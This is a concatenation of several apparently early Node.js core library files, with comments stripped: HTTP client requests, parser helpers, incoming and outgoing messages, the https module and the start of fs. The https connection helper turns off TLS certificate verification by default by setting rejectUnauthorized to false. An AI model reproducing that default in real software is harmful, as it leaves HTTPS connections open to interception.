    expectedProtocol = self.agent.protocol;

  if (options.path && / /.test(options.path)) {
    
    
    
    
    
    
    throw new TypeError('Request path contains unescaped characters.');
  } else if (protocol !== expectedProtocol) {
    throw new Error('Protocol "' + protocol + '" not supported. ' +
                    'Expected "' + expectedProtocol + '".');
  }

  var defaultPort = options.defaultPort || self.agent && self.agent.defaultPort;

  var port = options.port = options.port || defaultPort || 80;
  var host = options.host = options.hostname || options.host || 'localhost';

  if (util.isUndefined(options.setHost)) {
    var setHost = true;
  }

  self.socketPath = options.socketPath;

  var method = self.method = (options.method || 'GET').toUpperCase();
  self.path = options.path || '/';
  if (cb) {
    self.once('response', cb);
  }

  if (!util.isArray(options.headers)) {
    if (options.headers) {
      var keys = Object.keys(options.headers);
      for (var i = 0, l = keys.length; i < l; i++) {
        var key = keys[i];
        self.setHeader(key, options.headers[key]);
      }
    }
    if (host && !this.getHeader('host') && setHost) {
      var hostHeader = host;
      if (port && +port !== defaultPort) {
        hostHeader += ':' + port;
      }
      this.setHeader('Host', hostHeader);
    }
  }

  if (options.auth && !this.getHeader('Authorization')) {
    
    this.setHeader('Authorization', 'Basic ' +
                   new Buffer(options.auth).toString('base64'));
  }

  if (method === 'GET' ||
      method === 'HEAD' ||
      method === 'DELETE' ||
      method === 'OPTIONS' ||
      method === 'CONNECT') {
    self.useChunkedEncodingByDefault = false;
  } else {
    self.useChunkedEncodingByDefault = true;
  }

  if (util.isArray(options.headers)) {
    self._storeHeader(self.method + ' ' + self.path + ' HTTP/1.1\r\n',
                      options.headers);
  } else if (self.getHeader('expect')) {
    self._storeHeader(self.method + ' ' + self.path + ' HTTP/1.1\r\n',
                      self._renderHeaders());
  }

  if (self.socketPath) {
    self._last = true;
    self.shouldKeepAlive = false;
    var conn = self.agent.createConnection({ path: self.socketPath });
    self.onSocket(conn);
  } else if (self.agent) {
    
    
    
    
    if (!self.agent.keepAlive && !Number.isFinite(self.agent.maxSockets)) {
      self._last = true;
      self.shouldKeepAlive = false;
    } else {
      self._last = false;
      self.shouldKeepAlive = true;
    }
    self.agent.addRequest(self, options);
  } else {
    
    self._last = true;
    self.shouldKeepAlive = false;
    if (options.createConnection) {
      var conn = options.createConnection(options);
    } else {
      var conn = net.createConnection(options);
    }
    self.onSocket(conn);
  }

  self._deferToConnect(null, null, function() {
    self._flush();
    self = null;
  });
}

util.inherits(ClientRequest, OutgoingMessage);

exports.ClientRequest = ClientRequest;

ClientRequest.prototype.aborted = undefined;

ClientRequest.prototype._finish = function() {
  
  
  OutgoingMessage.prototype._finish.call(this);
};

ClientRequest.prototype._implicitHeader = function() {
  this._storeHeader(this.method + ' ' + this.path + ' HTTP/1.1\r\n',
                    this._renderHeaders());
};

ClientRequest.prototype.abort = function() {
  
  
  
  this.aborted = Date.now();

  
  if (this.res)
    this.res._dump();
  else
    this.once('response', function(res) {
      res._dump();
    });

  
  
  if (this.socket) {
    
    this.socket.destroy();
  }
};


function createHangUpError() {
  var error = new Error('socket hang up');
  error.code = 'ECONNRESET';
  return error;
}


function socketCloseListener() {
  var socket = this;
  var req = socket._httpMessage;

  
  
  
  socket.read();

  
  
  var parser = socket.parser;
  req.emit('close');
  if (req.res && req.res.readable) {
    
    req.res.emit('aborted');
    var res = req.res;
    res.on('end', function() {
      res.emit('close');
    });
    res.push(null);
  } else if (!req.res && !req.socket._hadError) {
    
    
    
    req.emit('error', createHangUpError());
    req.socket._hadError = true;
  }

  
  
  
  if (req.output)
    req.output.length = 0;
  if (req.outputEncodings)
    req.outputEncodings.length = 0;

  if (parser) {
    parser.finish();
    freeParser(parser, req, socket);
  }
}

function socketErrorListener(err) {
  var socket = this;
  var parser = socket.parser;
  var req = socket._httpMessage;

  if (req) {
    req.emit('error', err);
    
    
    req.socket._hadError = true;
  }

  if (parser) {
    parser.finish();
    freeParser(parser, req, socket);
  }
  socket.destroy();
}

function socketOnEnd() {
  var socket = this;
  var req = this._httpMessage;
  var parser = this.parser;

  if (!req.res && !req.socket._hadError) {
    
    
    req.emit('error', createHangUpError());
    req.socket._hadError = true;
  }
  if (parser) {
    parser.finish();
    freeParser(parser, req, socket);
  }
  socket.destroy();
}

function socketOnData(d) {
  var socket = this;
  var req = this._httpMessage;
  var parser = this.parser;

  assert(parser && parser.socket === socket);

  var ret = parser.execute(d);
  if (ret instanceof Error) {
    freeParser(parser, req, socket);
    socket.destroy();
    req.emit('error', ret);
    req.socket._hadError = true;
  } else if (parser.incoming && parser.incoming.upgrade) {
    
    var bytesParsed = ret;
    var res = parser.incoming;
    req.res = res;

    socket.removeListener('data', socketOnData);
    socket.removeListener('end', socketOnEnd);
    parser.finish();

    var bodyHead = d.slice(bytesParsed, d.length);

    var eventName = req.method === 'CONNECT' ? 'connect' : 'upgrade';
    if (EventEmitter.listenerCount(req, eventName) > 0) {
      req.upgradeOrConnect = true;

      
      socket.emit('agentRemove');
      socket.removeListener('close', socketCloseListener);
      socket.removeListener('error', socketErrorListener);

      
      
      socket._readableState.flowing = null;

      req.emit(eventName, res, socket, bodyHead);
      req.emit('close');
    } else {
      
      socket.destroy();
    }
    freeParser(parser, req, socket);
  } else if (parser.incoming && parser.incoming.complete &&
             
             
             
             parser.incoming.statusCode !== 100) {
    socket.removeListener('data', socketOnData);
    socket.removeListener('end', socketOnEnd);
    freeParser(parser, req, socket);
  }
}



function parserOnIncomingClient(res, shouldKeepAlive) {
  var socket = this.socket;
  var req = socket._httpMessage;


  
  if (req.domain && !res.domain) {

    res.domain = req.domain;
  }

  if (req.res) {
    
    
    socket.destroy();
    return;
  }
  req.res = res;

  
  if (req.method === 'CONNECT') {
    res.upgrade = true;
    return true; 
  }

  
  
  
  
  
  var isHeadResponse = req.method === 'HEAD';

  if (res.statusCode === 100) {
    
    delete req.res; 
    req.emit('continue');
    return true;
  }

  if (req.shouldKeepAlive && !shouldKeepAlive && !req.upgradeOrConnect) {
    
    
    
    req.shouldKeepAlive = false;
  }


  
  
  req.res = res;
  res.req = req;

  
  res.on('end', responseOnEnd);
  var handled = req.emit('response', res);

  
  
  
  if (!handled)
    res._dump();

  return isHeadResponse;
}


function responseOnEnd() {
  var res = this;
  var req = res.req;
  var socket = req.socket;

  if (!req.shouldKeepAlive) {
    if (socket.writable) {
      socket.destroySoon();
    }
    assert(!socket.writable);
  } else {
    if (req.timeoutCb) {
      socket.setTimeout(0, req.timeoutCb);
      req.timeoutCb = null;
    }
    socket.removeListener('close', socketCloseListener);
    socket.removeListener('error', socketErrorListener);
    
    
    process.nextTick(function() {
      socket.emit('free');
    });
  }
}

function tickOnSocket(req, socket) {
  var parser = parsers.alloc();
  req.socket = socket;
  req.connection = socket;
  parser.reinitialize(HTTPParser.RESPONSE);
  parser.socket = socket;
  parser.incoming = null;
  req.parser = parser;

  socket.parser = parser;
  socket._httpMessage = req;

  
  httpSocketSetup(socket);

  
  if (util.isNumber(req.maxHeadersCount)) {
    parser.maxHeaderPairs = req.maxHeadersCount << 1;
  } else {
    
    parser.maxHeaderPairs = 2000;
  }

  parser.onIncoming = parserOnIncomingClient;
  socket.on('error', socketErrorListener);
  socket.on('data', socketOnData);
  socket.on('end', socketOnEnd);
  socket.on('close', socketCloseListener);
  req.emit('socket', socket);
}

ClientRequest.prototype.onSocket = function(socket) {
  var req = this;

  process.nextTick(function() {
    if (req.aborted) {
      
      socket.emit('free');
    } else {
      tickOnSocket(req, socket);
    }
  });
};

ClientRequest.prototype._deferToConnect = function(method, arguments_, cb) {
  
  
  
  
  
  var self = this;
  var onSocket = function() {
    if (self.socket.writable) {
      if (method) {
        self.socket[method].apply(self.socket, arguments_);
      }
      if (cb) { cb(); }
    } else {
      self.socket.once('connect', function() {
        if (method) {
          self.socket[method].apply(self.socket, arguments_);
        }
        if (cb) { cb(); }
      });
    }
  }
  if (!self.socket) {
    self.once('socket', onSocket);
  } else {
    onSocket();
  }
};

ClientRequest.prototype.setTimeout = function(msecs, callback) {
  if (callback) this.once('timeout', callback);

  var self = this;
  function emitTimeout() {
    self.emit('timeout');
  }

  if (this.socket && this.socket.writable) {
    if (this.timeoutCb)
      this.socket.setTimeout(0, this.timeoutCb);
    this.timeoutCb = emitTimeout;
    this.socket.setTimeout(msecs, emitTimeout);
    return;
  }

  
  this.timeoutCb = emitTimeout;
  if (this.socket) {
    var sock = this.socket;
    this.socket.once('connect', function() {
      sock.setTimeout(msecs, emitTimeout);
    });
    return;
  }

  this.once('socket', function(sock) {
    sock.setTimeout(msecs, emitTimeout);
  });
};

ClientRequest.prototype.setNoDelay = function() {
  this._deferToConnect('setNoDelay', arguments);
};
ClientRequest.prototype.setSocketKeepAlive = function() {
  this._deferToConnect('setKeepAlive', arguments);
};

ClientRequest.prototype.clearTimeout = function(cb) {
  this.setTimeout(0, cb);
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   

========






















var FreeList = require('freelist').FreeList;
var HTTPParser = process.binding('http_parser').HTTPParser;

var incoming = require('_http_incoming');
var IncomingMessage = incoming.IncomingMessage;
var readStart = incoming.readStart;
var readStop = incoming.readStop;

var isNumber = require('util').isNumber;

exports.CRLF = '\r\n';
exports.chunkExpression = /chunk/i;
exports.continueExpression = /100-continue/i;
exports.methods = HTTPParser.methods;

var kOnHeaders = HTTPParser.kOnHeaders | 0;
var kOnHeadersComplete = HTTPParser.kOnHeadersComplete | 0;
var kOnBody = HTTPParser.kOnBody | 0;
var kOnMessageComplete = HTTPParser.kOnMessageComplete | 0;






function parserOnHeaders(headers, url) {
  
  if (this.maxHeaderPairs <= 0 ||
      this._headers.length < this.maxHeaderPairs) {
    this._headers = this._headers.concat(headers);
  }
  this._url += url;
}






function parserOnHeadersComplete(info) {

  var parser = this;
  var headers = info.headers;
  var url = info.url;

  if (!headers) {
    headers = parser._headers;
    parser._headers = [];
  }

  if (!url) {
    url = parser._url;
    parser._url = '';
  }

  parser.incoming = new IncomingMessage(parser.socket);
  parser.incoming.httpVersionMajor = info.versionMajor;
  parser.incoming.httpVersionMinor = info.versionMinor;
  parser.incoming.httpVersion = info.versionMajor + '.' + info.versionMinor;
  parser.incoming.url = url;

  var n = headers.length;

  
  if (parser.maxHeaderPairs > 0) {
    n = Math.min(n, parser.maxHeaderPairs);
  }

  parser.incoming._addHeaderLines(headers, n);

  if (isNumber(info.method)) {
    
    parser.incoming.method = HTTPParser.methods[info.method];
  } else {
    
    parser.incoming.statusCode = info.statusCode;
    parser.incoming.statusMessage = info.statusMessage;
  }

  parser.incoming.upgrade = info.upgrade;

  var skipBody = false; 

  if (!info.upgrade) {
    
    
    
    skipBody = parser.onIncoming(parser.incoming, info.shouldKeepAlive);
  }

  return skipBody;
}



function parserOnBody(b, start, len) {
  var parser = this;
  var stream = parser.incoming;

  
  if (!stream)
    return;

  var socket = stream.socket;

  
  if (len > 0 && !stream._dumped) {
    var slice = b.slice(start, start + len);
    var ret = stream.push(slice);
    if (!ret)
      readStop(socket);
  }
}

function parserOnMessageComplete() {
  var parser = this;
  var stream = parser.incoming;

  if (stream) {
    stream.complete = true;
    
    var headers = parser._headers;
    if (headers) {
      parser.incoming._addHeaderLines(headers, headers.length);
      parser._headers = [];
      parser._url = '';
    }

    if (!stream.upgrade)
      
      stream.push(null);
  }

  if (stream && !parser.incoming._pendings.length) {
    
    stream.push(null);
  }

  
  readStart(parser.socket);
}


var parsers = new FreeList('parsers', 1000, function() {
  var parser = new HTTPParser(HTTPParser.REQUEST);

  parser._headers = [];
  parser._url = '';

  
  
  
  
  
  parser[kOnHeaders] = parserOnHeaders;
  parser[kOnHeadersComplete] = parserOnHeadersComplete;
  parser[kOnBody] = parserOnBody;
  parser[kOnMessageComplete] = parserOnMessageComplete;

  return parser;
});
exports.parsers = parsers;









function freeParser(parser, req, socket) {
  if (parser) {
    parser._headers = [];
    parser.onIncoming = null;
    if (parser.socket)
      parser.socket.parser = null;
    parser.socket = null;
    parser.incoming = null;
    if (parsers.free(parser) === false)
      parser.close();
    parser = null;
  }
  if (req) {
    req.parser = null;
  }
  if (socket) {
    socket.parser = null;
  }
}
exports.freeParser = freeParser;


function ondrain() {
  if (this._httpMessage) this._httpMessage.emit('drain');
}


function httpSocketSetup(socket) {
  socket.removeListener('drain', ondrain);
  socket.on('drain', ondrain);
}
exports.httpSocketSetup = httpSocketSetup;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               

========






















var util = require('util');
var Stream = require('stream');

function readStart(socket) {
  if (socket && !socket._paused && socket.readable)
    socket.resume();
}
exports.readStart = readStart;

function readStop(socket) {
  if (socket)
    socket.pause();
}
exports.readStop = readStop;



function IncomingMessage(socket) {
  Stream.Readable.call(this);

  
  
  

  this.socket = socket;
  this.connection = socket;

  this.httpVersionMajor = null;
  this.httpVersionMinor = null;
  this.httpVersion = null;
  this.complete = false;
  this.headers = {};
  this.rawHeaders = [];
  this.trailers = {};
  this.rawTrailers = [];

  this.readable = true;

  this._pendings = [];
  this._pendingIndex = 0;
  this.upgrade = null;

  
  this.url = '';
  this.method = null;

  
  this.statusCode = null;
  this.statusMessage = null;
  this.client = this.socket;

  
  this._consuming = false;

  
  
  this._dumped = false;
}
util.inherits(IncomingMessage, Stream.Readable);


exports.IncomingMessage = IncomingMessage;


IncomingMessage.prototype.setTimeout = function(msecs, callback) {
  if (callback)
    this.on('timeout', callback);
  this.socket.setTimeout(msecs);
};


IncomingMessage.prototype.read = function(n) {
  this._consuming = true;
  this.read = Stream.Readable.prototype.read;
  return this.read(n);
};


IncomingMessage.prototype._read = function(n) {
  
  
  
  if (this.socket.readable)
    readStart(this.socket);
};





IncomingMessage.prototype.destroy = function(error) {
  if (this.socket)
    this.socket.destroy(error);
};


IncomingMessage.prototype._addHeaderLines = function(headers, n) {
  if (headers && headers.length) {
    var raw, dest;
    if (this.complete) {
      raw = this.rawTrailers;
      dest = this.trailers;
    } else {
      raw = this.rawHeaders;
      dest = this.headers;
    }
    raw.push.apply(raw, headers);

    for (var i = 0; i < n; i += 2) {
      var k = headers[i];
      var v = headers[i + 1];
      this._addHeaderLine(k, v, dest);
    }
  }
};









IncomingMessage.prototype._addHeaderLine = function(field, value, dest) {
  field = field.toLowerCase();
  switch (field) {
    
    case 'set-cookie':
      if (!util.isUndefined(dest[field])) {
        dest[field].push(value);
      } else {
        dest[field] = [value];
      }
      break;

    
    
    case 'content-type':
    case 'content-length':
    case 'user-agent':
    case 'referer':
    case 'host':
    case 'authorization':
    case 'proxy-authorization':
    case 'if-modified-since':
    case 'if-unmodified-since':
    case 'from':
    case 'location':
    case 'max-forwards':
      
      if (util.isUndefined(dest[field]))
        dest[field] = value;
      break;

    default:
      
      if (!util.isUndefined(dest[field]))
        dest[field] += ', ' + value;
      else {
        dest[field] = value;
      }
  }
};




IncomingMessage.prototype._dump = function() {
  if (!this._dumped) {
    this._dumped = true;
    this.resume();
  }
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      

========






















var assert = require('assert').ok;
var Stream = require('stream');
var timers = require('timers');
var util = require('util');

var common = require('_http_common');

var CRLF = common.CRLF;
var chunkExpression = common.chunkExpression;


var connectionExpression = /Connection/i;
var transferEncodingExpression = /Transfer-Encoding/i;
var closeExpression = /close/i;
var contentLengthExpression = /Content-Length/i;
var dateExpression = /Date/i;
var expectExpression = /Expect/i;

var automaticHeaders = {
  connection: true,
  'content-length': true,
  'transfer-encoding': true,
  date: true
};


var dateCache;
function utcDate() {
  if (!dateCache) {
    var d = new Date();
    dateCache = d.toUTCString();
    timers.enroll(utcDate, 1000 - d.getMilliseconds());
    timers._unrefActive(utcDate);
  }
  return dateCache;
}
utcDate._onTimeout = function() {
  dateCache = undefined;
};


function OutgoingMessage() {
  Stream.call(this);

  this.output = [];
  this.outputEncodings = [];
  this.outputCallbacks = [];

  this.writable = true;

  this._last = false;
  this.chunkedEncoding = false;
  this.shouldKeepAlive = true;
  this.useChunkedEncodingByDefault = true;
  this.sendDate = false;
  this._removedHeader = {};

  this._hasBody = true;
  this._trailer = '';

  this.finished = false;
  this._hangupClose = false;

  this.socket = null;
  this.connection = null;
}
util.inherits(OutgoingMessage, Stream);


exports.OutgoingMessage = OutgoingMessage;


OutgoingMessage.prototype.setTimeout = function(msecs, callback) {
  if (callback)
    this.on('timeout', callback);
  if (!this.socket) {
    this.once('socket', function(socket) {
      socket.setTimeout(msecs);
    });
  } else
    this.socket.setTimeout(msecs);
};





OutgoingMessage.prototype.destroy = function(error) {
  if (this.socket)
    this.socket.destroy(error);
  else
    this.once('socket', function(socket) {
      socket.destroy(error);
    });
};



OutgoingMessage.prototype._send = function(data, encoding, callback) {
  
  
  
  if (!this._headerSent) {
    if (util.isString(data) &&
        encoding !== 'hex' &&
        encoding !== 'base64') {
      data = this._header + data;
    } else {
      this.output.unshift(this._header);
      this.outputEncodings.unshift('binary');
      this.outputCallbacks.unshift(null);
    }
    this._headerSent = true;
  }
  return this._writeRaw(data, encoding, callback);
};


OutgoingMessage.prototype._writeRaw = function(data, encoding, callback) {
  if (util.isFunction(encoding)) {
    callback = encoding;
    encoding = null;
  }

  if (data.length === 0) {
    if (util.isFunction(callback))
      process.nextTick(callback);
    return true;
  }

  if (this.connection &&
      this.connection._httpMessage === this &&
      this.connection.writable &&
      !this.connection.destroyed) {
    
    while (this.output.length) {
      if (!this.connection.writable) {
        this._buffer(data, encoding, callback);
        return false;
      }
      var c = this.output.shift();
      var e = this.outputEncodings.shift();
      var cb = this.outputCallbacks.shift();
      this.connection.write(c, e, cb);
    }

    
    return this.connection.write(data, encoding, callback);
  } else if (this.connection && this.connection.destroyed) {
    
    
    return false;
  } else {
    
    this._buffer(data, encoding, callback);
    return false;
  }
};


OutgoingMessage.prototype._buffer = function(data, encoding, callback) {
  this.output.push(data);
  this.outputEncodings.push(encoding);
  this.outputCallbacks.push(callback);
  return false;
};


OutgoingMessage.prototype._storeHeader = function(firstLine, headers) {
  
  
  var state = {
    sentConnectionHeader: false,
    sentContentLengthHeader: false,
    sentTransferEncodingHeader: false,
    sentDateHeader: false,
    sentExpect: false,
    messageHeader: firstLine
  };

  var field, value;

  if (headers) {
    var keys = Object.keys(headers);
    var isArray = util.isArray(headers);
    var field, value;

    for (var i = 0, l = keys.length; i < l; i++) {
      var key = keys[i];
      if (isArray) {
        field = headers[key][0];
        value = headers[key][1];
      } else {
        field = key;
        value = headers[key];
      }

      if (util.isArray(value)) {
        for (var j = 0; j < value.length; j++) {
          storeHeader(this, state, field, value[j]);
        }
      } else {
        storeHeader(this, state, field, value);
      }
    }
  }

  
  if (this.sendDate === true && state.sentDateHeader === false) {
    state.messageHeader += 'Date: ' + utcDate() + CRLF;
  }

  
  
  
  
  
  
  
  
  
  
  
  var statusCode = this.statusCode;
  if ((statusCode === 204 || statusCode === 304) &&
      this.chunkedEncoding === true) {

    this.chunkedEncoding = false;
    this.shouldKeepAlive = false;
  }

  
  if (this._removedHeader.connection) {
    this._last = true;
    this.shouldKeepAlive = false;
  } else if (state.sentConnectionHeader === false) {
    var shouldSendKeepAlive = this.shouldKeepAlive &&
        (state.sentContentLengthHeader ||
         this.useChunkedEncodingByDefault ||
         this.agent);
    if (shouldSendKeepAlive) {
      state.messageHeader += 'Connection: keep-alive\r\n';
    } else {
      this._last = true;
      state.messageHeader += 'Connection: close\r\n';
    }
  }

  if (state.sentContentLengthHeader === false &&
      state.sentTransferEncodingHeader === false) {
    if (this._hasBody && !this._removedHeader['transfer-encoding']) {
      if (this.useChunkedEncodingByDefault) {
        state.messageHeader += 'Transfer-Encoding: chunked\r\n';
        this.chunkedEncoding = true;
      } else {
        this._last = true;
      }
    } else {
      
      this.chunkedEncoding = false;
    }
  }

  this._header = state.messageHeader + CRLF;
  this._headerSent = false;

  
  
  if (state.sentExpect) this._send('');
};

function storeHeader(self, state, field, value) {
  
  
  if (/[\r\n]/.test(value))
    value = value.replace(/[\r\n]+[ \t]*/g, '');

  state.messageHeader += field + ': ' + value + CRLF;

  if (connectionExpression.test(field)) {
    state.sentConnectionHeader = true;
    if (closeExpression.test(value)) {
      self._last = true;
    } else {
      self.shouldKeepAlive = true;
    }

  } else if (transferEncodingExpression.test(field)) {
    state.sentTransferEncodingHeader = true;
    if (chunkExpression.test(value)) self.chunkedEncoding = true;

  } else if (contentLengthExpression.test(field)) {
    state.sentContentLengthHeader = true;
  } else if (dateExpression.test(field)) {
    state.sentDateHeader = true;
  } else if (expectExpression.test(field)) {
    state.sentExpect = true;
  }
}


OutgoingMessage.prototype.setHeader = function(name, value) {
  if (arguments.length < 2) {
    throw new Error('`name` and `value` are required for setHeader().');
  }

  if (this._header) {
    throw new Error('Can\'t set headers after they are sent.');
  }

  var key = name.toLowerCase();
  this._headers = this._headers || {};
  this._headerNames = this._headerNames || {};
  this._headers[key] = value;
  this._headerNames[key] = name;

  if (automaticHeaders[key]) {
    this._removedHeader[key] = false;
  }
};


OutgoingMessage.prototype.getHeader = function(name) {
  if (arguments.length < 1) {
    throw new Error('`name` is required for getHeader().');
  }

  if (!this._headers) return;

  var key = name.toLowerCase();
  return this._headers[key];
};


OutgoingMessage.prototype.removeHeader = function(name) {
  if (arguments.length < 1) {
    throw new Error('`name` is required for removeHeader().');
  }

  if (this._header) {
    throw new Error('Can\'t remove headers after they are sent.');
  }

  var key = name.toLowerCase();

  if (key === 'date')
    this.sendDate = false;
  else if (automaticHeaders[key])
    this._removedHeader[key] = true;

  if (this._headers) {
    delete this._headers[key];
    delete this._headerNames[key];
  }
};


OutgoingMessage.prototype._renderHeaders = function() {
  if (this._header) {
    throw new Error('Can\'t render headers after they are sent to the client.');
  }

  if (!this._headers) return {};

  var headers = {};
  var keys = Object.keys(this._headers);
  for (var i = 0, l = keys.length; i < l; i++) {
    var key = keys[i];
    headers[this._headerNames[key]] = this._headers[key];
  }
  return headers;
};


Object.defineProperty(OutgoingMessage.prototype, 'headersSent', {
  configurable: true,
  enumerable: true,
  get: function() { return !!this._header; }
});


OutgoingMessage.prototype.write = function(chunk, encoding, callback) {
  var self = this;

  if (this.finished) {
    var err = new Error('write after end');
    process.nextTick(function() {
      self.emit('error', err);
      if (callback) callback(err);
    });

    return true;
  }

  if (!this._header) {
    this._implicitHeader();
  }

  if (!this._hasBody) {

    return true;
  }

  if (!util.isString(chunk) && !util.isBuffer(chunk)) {
    throw new TypeError('first argument must be a string or Buffer');
  }


  
  
  if (chunk.length === 0) return true;

  var len, ret;
  if (this.chunkedEncoding) {
    if (util.isString(chunk) &&
        encoding !== 'hex' &&
        encoding !== 'base64' &&
        encoding !== 'binary') {
      len = Buffer.byteLength(chunk, encoding);
      chunk = len.toString(16) + CRLF + chunk + CRLF;
      ret = this._send(chunk, encoding, callback);
    } else {
      
      if (util.isString(chunk))
        len = Buffer.byteLength(chunk, encoding);
      else
        len = chunk.length;

      if (this.connection && !this.connection.corked) {
        this.connection.cork();
        var conn = this.connection;
        process.nextTick(function connectionCork() {
          if (conn)
            conn.uncork();
        });
      }
      this._send(len.toString(16), 'binary', null);
      this._send(crlf_buf, null, null);
      this._send(chunk, encoding, null);
      ret = this._send(crlf_buf, null, callback);
    }
  } else {
    ret = this._send(chunk, encoding, callback);
  }

  return ret;
};


OutgoingMessage.prototype.addTrailers = function(headers) {
  this._trailer = '';
  var keys = Object.keys(headers);
  var isArray = util.isArray(headers);
  var field, value;
  for (var i = 0, l = keys.length; i < l; i++) {
    var key = keys[i];
    if (isArray) {
      field = headers[key][0];
      value = headers[key][1];
    } else {
      field = key;
      value = headers[key];
    }

    this._trailer += field + ': ' + value + CRLF;
  }
};


var crlf_buf = new Buffer('\r\n');


OutgoingMessage.prototype.end = function(data, encoding, callback) {
  if (util.isFunction(data)) {
    callback = data;
    data = null;
  } else if (util.isFunction(encoding)) {
    callback = encoding;
    encoding = null;
  }

  if (data && !util.isString(data) && !util.isBuffer(data)) {
    throw new TypeError('first argument must be a string or Buffer');
  }

  if (this.finished) {
    return false;
  }

  var self = this;
  function finish() {
    self.emit('finish');
  }

  if (util.isFunction(callback))
    this.once('finish', callback);


  if (!this._header) {
    this._implicitHeader();
  }

  if (data && !this._hasBody) {

    data = null;
  }

  if (this.connection && data)
    this.connection.cork();

  var ret;
  if (data) {
    
    ret = this.write(data, encoding);
  }

  if (this._hasBody && this.chunkedEncoding) {
    ret = this._send('0\r\n' + this._trailer + '\r\n', 'binary', finish);
  } else {
    
    ret = this._send('', 'binary', finish);
  }

  if (this.connection && data)
    this.connection.uncork();

  this.finished = true;

  
  

  if (this.output.length === 0 && this.connection._httpMessage === this) {
    this._finish();
  }

  return ret;
};


OutgoingMessage.prototype._finish = function() {
  assert(this.connection);
  this.emit('prefinish');
};





















OutgoingMessage.prototype._flush = function() {
  if (this.socket && this.socket.writable) {
    var ret;
    while (this.output.length) {
      var data = this.output.shift();
      var encoding = this.outputEncodings.shift();
      var cb = this.outputCallbacks.shift();
      ret = this.socket.write(data, encoding, cb);
    }

    if (this.finished) {
      
      this._finish();
    } else if (ret) {
      
      this.emit('drain');
    }
  }
};


OutgoingMessage.prototype.flush = function() {
  if (!this._header) {
    
    this._implicitHeader();
    this._send('');
  }
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           

========






















var tls = require('tls');
var url = require('url');
var http = require('http');
var util = require('util');
var inherits = require('util').inherits;


function Server(opts, requestListener) {
  if (!(this instanceof Server)) return new Server(opts, requestListener);

  if (process.features.tls_npn && !opts.NPNProtocols) {
    opts.NPNProtocols = ['http/1.1', 'http/1.0'];
  }

  tls.Server.call(this, opts, http._connectionListener);

  this.httpAllowHalfOpen = false;

  if (requestListener) {
    this.addListener('request', requestListener);
  }

  this.addListener('clientError', function(err, conn) {
    conn.destroy();
  });

  this.timeout = 2 * 60 * 1000;
}
inherits(Server, tls.Server);
exports.Server = Server;

Server.prototype.setTimeout = http.Server.prototype.setTimeout;

exports.createServer = function(opts, requestListener) {
  return new Server(opts, requestListener);
};




function createConnection(port, host, options) {
  if (util.isObject(port)) {
    options = port;
  } else if (util.isObject(host)) {
    options = host;
  } else if (util.isObject(options)) {
    options = options;
  } else {
    options = {};
  }

  if (util.isNumber(port)) {
    options.port = port;
  }

  if (util.isString(host)) {
    options.host = host;
  }

  if (util.isUndefined(options.rejectUnauthorized))
    options.rejectUnauthorized = false;
  
  return tls.connect(options);
}


function Agent(options) {
  http.Agent.call(this, options);
  this.defaultPort = 443;
  this.protocol = 'https:';
}
inherits(Agent, http.Agent);
Agent.prototype.createConnection = createConnection;

Agent.prototype.getName = function(options) {
  var name = http.Agent.prototype.getName.call(this, options);

  name += ':';
  if (options.ca)
    name += options.ca;

  name += ':';
  if (options.cert)
    name += options.cert;

  name += ':';
  if (options.ciphers)
    name += options.ciphers;

  name += ':';
  if (options.key)
    name += options.key;

  name += ':';
  if (options.pfx)
    name += options.pfx;

  name += ':';
  if (!util.isUndefined(options.rejectUnauthorized))
    name += options.rejectUnauthorized;

  return name;
};

var globalAgent = new Agent();

exports.globalAgent = globalAgent;
exports.Agent = Agent;

exports.request = function(options, cb) {
  if (util.isString(options)) {
    options = url.parse(options);
  } else {
    options = util._extend({}, options);
  }
  options._defaultAgent = globalAgent;
  return http.request(options, cb);
};

exports.get = function(options, cb) {
  var req = exports.request(options, cb);
  req.end();
  return req;
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         

========




























var util = require('util');
var pathModule = require('path');

var binding = process.binding('fs');
var constants = process.binding('constants');
var fs = exports;
var Stream = require('stream').Stream;
var EventEmitter = require('events').EventEmitter;

var Readable = Stream.Readable;
var Writable = Stream.Writable;

var kMinPoolSpace = 128;
var kMaxLength = require('smalloc').kMaxLength;

var O_APPEND = constants.O_APPEND || 0;
var O_CREAT = constants.O_CREAT || 0;
var O_EXCL = constants.O_EXCL || 0;
var O_RDONLY = constants.O_RDONLY || 0;
var O_RDWR = constants.O_RDWR || 0;
var O_SYNC = constants.O_SYNC || 0;
var O_TRUNC = constants.O_TRUNC || 0;
var O_WRONLY = constants.O_WRONLY || 0;

var isWindows = process.platform === 'win32';

var DEBUG = process.env.NODE_DEBUG && /fs/.test(process.env.NODE_DEBUG);
var errnoException = util._errnoException;


function rethrow() {
  
  
  if (DEBUG) {
